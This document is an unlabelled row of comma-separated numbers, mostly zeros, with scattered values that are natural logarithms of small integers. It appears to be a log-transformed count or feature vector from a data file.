0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 6.351472826488934, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 2.550898738446989, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.3862943611198906, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0, 0.0, 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 3.58351893845611, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.6094379124341003, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 2.302585092994046, 0.0, 0.0, 2.8398715690385097, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0, 1.9459101490553132, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 1.0986122886681098, 4.624972813284271, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.0794415416798357, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.4965075614664802, 0, 0.0, 0.0, 0, 0.0, 0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.178053830347946, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.258096538021482, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.178053830347946, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.330733340286331, 0.0, 2.1972245773362196, 0.0, 5.030437921392435, 0.0, 6.836775589408022, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 3.8918202981106265, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 2.0794415416798357, 2.9444389791664403, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.581130849408909, 4.969640753475787, 0.0, 5.723585101952381, 1.3862943611198906, 0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 1.0986122886681098, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.9957322735539913, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 2.0794415416798357, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 4.06534854782536, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.931825632724326, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.9444389791664403, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 1.0986122886681098, 3.6375861597263857, 0.0, 0.0, 0.0, 0.0, 4.110873864173311, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 4.605170185988092, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 8.83331693749932, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 4.110873864173311, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 